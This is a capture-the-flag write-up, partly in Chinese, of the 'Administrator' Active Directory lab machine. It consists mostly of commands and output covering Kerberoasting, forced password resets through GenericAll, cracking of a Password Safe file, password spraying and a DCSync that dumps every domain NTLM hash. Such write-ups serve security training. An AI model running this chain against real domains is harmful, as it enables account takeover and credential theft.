Tags: Kerberoast、GenericAll、PasswordSafe3
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following
account: Username: Olivia Password: ichliebedich
测试一下,这个账户有 WinRM 权限的,目前是有了初始 Shell,因此可以省略部分枚举。
Recon & Enum
nmap -p- --min-rate 1000 -T4 -sC -sV -O -v
---
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-25 08:18:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
54492/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
54497/tcp open msrpc Microsoft Windows RPC
54508/tcp open msrpc Microsoft Windows RPC
54519/tcp open msrpc Microsoft Windows RPC
尝试了一下,匿名登录和 Olivia 的凭据都不行
Shell as Olivia
sudo rdate -n administrator.htb
evil-winrm -i administrator.htb -u Olivia -p ichliebedich
*Evil-WinRM* PS C:\Users\olivia\Documents> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator alexander benjamin
emily emma ethan
Guest krbtgt michael
olivia
The command completed with one or more errors.
Local Enum

BloodHound 可以看到,从 Olivia 可以拿到 ShareModerators组权限
targetedKerberoast -d administrator.htb -u Olivia -p ichliebedich
---
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (michael)
$krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$648f738f3f52aa782ca6af46533c87cf$f88ca99cd22dd4658952709717c84cb358333a031093d218ec7293aef34b66cebe55cc7d5b2e56a7c0142fa0cc869d31200447a08d0607c5c438eaf8ffdfa6cb5fb39d31ce46a539d0f9211ab4a89300526bfc6ae6c7eda4affd79e773a9768d4b6da6296cca06d0e6a1c6e6f6b03dc4b1696401907a207bb3ba523c8214987e6402c6c62a451bbe11b6e9c3a7924300b03c8cfb8f7937b01e9497fa4ceedfca17758129f4b8c644cf6706cf76accb7f834d8f5bb1fc9868f7e748de6fd3baf5758d7ae11b9dca6c7a5877901181591ffee40fa4b4683446de0ef36caa20e5f3fb08b8ede635a49514b94841fa7dcb01d682bc26e88f046dfa4577ad438900c7ac199a1af0969772fa8c518e9c5f2565114cc7791d9c207dae0788aef3b5c5b64c4af9eaff8c60b94c5ea0eda3e9ec6e838b79c1f5d979059915ec88a46494c54ab33cdb344f14a559915935842b3407b405ef694a2490b2923c9abdbfdf9982f72c55c05d61c5d464bf557d510d6663036031741c59074d481640a9d6afa66d11edfe5e4db2a437661a2dc2b4c4d2b1253aa1558e696400f87ab78f674b36076f6139f7d0dd11c79bcf19a4f270185a25891bf7fb72c4916fdbfe326e511f0b57d91272273713e7c5c30b1b7f66fa71636d2a135d4fe5956d2ca22f00d477ccb7dcacbbc2511df1451c619cee5c9bea14fc01eef196f9607ec540912081d8840de3a2d2c99d2974bc651a8073afa132c42fa6485d80d55c0bb746221fbe50a4950cde7a3447bc54fcc38b4db7ee735adc7bfeb16f8c12935673aebc30357c4fa5c25250d3b63cebe059e6e926c4947d22005ee1548bf7181797fb2829e06d254e5f1a147eb50ef3ec6529cd2705d60480e07c91973238ece8fb7c1c053c8a84cb3ec7829adf78599853b7be9f9453d5d0edf8d8a983e55cc79b7976e7b125f2cdeaea07d6348859a87699960bc360f67e3ba99ef76cf47e8070fd93be4b24ee9743bec63319338c5aa7b61d7c6af72ea2d4151240a3a1e16f59733d38baf1299a7436650df51d4b8d210a440f2c9c3c84269481fababf6f4af2e1eb2a3a02edd5ed7934029bfb9322ca226c3e76f39f96f0ced075a7c47a546261bb58c275572f4e65a1b2851bad89ba2545885a29fca26b0e9b4f9bd99370072bfbaed61e3cf25c5bf193ec5f007af510c92a9ecd90535c0dcaaaa3efc6153932d2f6993d08e42fd51fd17277beecea39f1d238b20deb0b82050952b38471c70c0ab0ccf7550145818a84e7d83e85421c5a289a30bcb3e96052512a7636d841ee2664231535fa88e7bc0d85698c7c0f009554c4761f61b3c96bd64b34d99bb7c485cd7bb8ec4f2b1613281389ec353436e8abb4df34d77446f1ad8a42a2359f5dc7e0905b122000acffb2251a89545b475c412f6bcd088debc6bf941e9d8d9e4103df4022dc8a42c855d0a8224a43205be2d5def1871ebcd761c118d70d296435ccad4f7f70d4646561b6a8aff32682951831437509f5707be5df2daa08
Shell as Michael
bloodyAD --host administrator.htb -d administrator.htb -u Olivia -p ichliebedich set password Michael 'Passwd@123'
---
[+] Password changed successfully!
从 BloodHound 上也看不到 Michael 有什么特殊权限,FTP 与 SMB 也没什么新发现,那么继续前往 Benjamin 用户
Shell as Emily
bloodyAD --host administrator.htb -d administrator.htb -u Michael -p 'Passwd@123' set password Benjamin 'Passwd@123'
---
[+] Password changed successfully!
BloodHound 可以看到 Benjamin 用户不在远程管理组,不过这个用户有 FTP 权限
ftp [email protected]
---
Connected to administrator.htb.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||61709|)
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
pwsafe2john Backup.psafe3 | tee hash.Backup
---
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
john hash.Backup --wordlist=/usr/share/wordlists/rockyou.txt
---
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho (Backu)
1g 0:00:00:01 DONE (2024-12-25 21:27) 0.8849g/s 7249p/s 7249c/s 7249C/s newzealand..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

里面存了三个凭据,可以取出来喷射一下
alexander / UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily / UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma / WwANQWnmJnGV07WQN8bMS7FMAbjNur
netexec smb administrator.htb -u res/user.list -p res/pass.list --continue-on-success
...
SMB 10.129.23.248 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
SMB 10.129.23.248 445 DC [+] administrator.htb\olivia:ichliebedich
...

Shell as Administrator

targetedKerberoast -v -d administrator.htb -u Emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
---
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$0543e202621ee26e6397f55c736d143b$906ff16cd0f0fc8bce8f6f9a5525f209c656111ae7dcc0bcf6d8728c0307e510e13edba74d7743f3aa449428acc969ead85b369cc5e5affdb92c8ecbfc4bfef1bcbc5fe0d0555a325400177e88514d6f1406cd3e22c1b8bcdb5a08f381c1333f1913629bca320f40fb0e761f525a9ef593af5e9af7cbacf8a640400fe86d923e728b42ec40154540d8ce1b4acd84e1e2f079519ac2469daf4ded842b1efcbf61c34ef49a8a63aa4ea0519095e64c715246bcf51f9eb03e9987acb0962611d21cf51253e2379626a7af7fe1121791cbb352ac646152700a80cb12b37ff728aca429c728c04abe153246bc2a57816ca29cbd6d78983f8f40414a204f0b7a0b150b41e3b396477b02cf03ca5e680b70510842421a5f064f5f884617517638fe7d51f8783dcad7f7d42f6b0018cdd09d48895e1f883ea3f8f48219b9bfb63f4cda10ff36a1f91413a7121e2c975e16048614ccc3ddfb195d29ffda2488624c70631f953c094625ffced24357fab7cf326d40fba926469ead7d0c989a8d31495cdf5a60897257ac04e08971876654aea77cd236859947b8ddf7fe49e84bdfec5dc31f107677e4ae8a2ee9f7d7380e112b0cf802a14adefe9703d876feed7dc9ef25231ec0fcc8444ccd5bcc99c72563b194c1a909792008df74568361778b7dfb7ca85acc783b0dcc3a6ec82c827a3a705f1cf6d528dec8424a2e355a7657ac2347d5bd40a980907e58e40ef5e45182bbaf2e24e6c42e02a1c5da421c1d92e8e8e00a4a6acda84cc96cf7db581bbfb5ed4781544001e908884a46b4f1a1e1a2daca456e72759f6e639449a67733b4d1e4c26cf74e7911ae34687eb15e0040ff4ffe292fca57a46b3f6c1c7fd1a4948bbf871ab2a80d97ec6e28f69aa201321672094a3d228ecc52a501e5b944457a5b72170db9739596454bc054c408c0ff77aa8f827a74776e59c0f4c5dd305798c4fb27a2547092dffd87c989a6c6054e5d909a5ecef5fd200b37375be4f5cece5f4348e12beba418cfcde90f75751d30701490d95f47983725b64ba053e04bd879da89926466f49fbb73c7dfc0a2c2d17bae4486c99d5b8a80c160d0e3ce41814beb0b2d5ca4029d7f16067568ddb9c077cb6ac86475687e25b9f30338e3c6ddf1042122a225048f84b01d7f0ef6334584a2aa640acec7ba893faa26fe49933c6628ef60765128338bb04f6a4b85b25e1c7ffcfc136d56ce4f72f57687827af8ed4fb32ac6e378e7cccddf884ca28f7b5b9fa5108479c5ecf80aaf78853a2b30be3c4017a7cab7548de56867e265e0a3be95e496d9fd164f86fb78b4117639c36e025c7a966eca42545c3d54673235bdaad3951998613c77a5fc437e60378c6a4d0df807777892d12ccf1e990f11189823717cf2a13d81dbd07f9ab7d5ef5362e46e75a0f93553fec2aeddaca22f52d15ce1f04022453f65dae8dfb21540c0828f2980cfb313523405c1a06a801cecdbe3f16dcf277ba0fcacb828d7afd6058ee1fb745e62b52c64b4217edc5352c2c1d6067e
[VERBOSE] SPN removed successfully for (ethan)
hashcat -m 13100 res/hash.ethan /usr/share/wordlists/rockyou.txt
---
...
64b4217edc5352c2c1d6067e:limpbizkit
...
impacket-secretsdump administrator.htb/ethan:[email protected] -just-dc-ntlm
---
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Cleaning up...

More and More
经典域渗透机器,没什么坑。
Dump Hash
impacket-secretsdump administrator.htb/[email protected] -hashes :3dc553ce4b9fd20bd016e098d2d2fd2e -just-dc-ntlm
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Cleaning up...
